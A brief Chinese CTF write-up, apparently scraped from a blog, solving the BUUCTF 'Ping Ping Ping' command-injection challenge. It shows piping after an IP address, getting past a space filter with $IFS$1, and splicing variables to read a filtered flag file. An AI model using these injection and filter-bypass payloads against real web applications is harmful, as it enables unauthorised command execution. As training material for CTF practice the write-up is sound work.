BUUCTF-[GXYCTF2019]Ping Ping Ping（命令执行）

标签：tar   图片   img   数字   pre   过滤   pps   ima   返回   

1、ping 127.0.0.1

可以
127.0.0.1 | ls

返回的是啥？？？
127.0.0.1|ls

ls是可以执行的，就是把空格给过滤了
读flag.php及index.php，空格绕过一般是：$IFS、${IFS}、$IFS$一位数字
但是这里试了$IFS$1才行

但是flag.php读不了，读源码发现过滤了flag
变量拼接

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

F12

BUUCTF-[GXYCTF2019]Ping Ping Ping（命令执行）

标签：tar   图片   img   数字   pre   过滤   pps   ima   返回   

原文地址：https://www.cnblogs.com/wrnan/p/12811449.html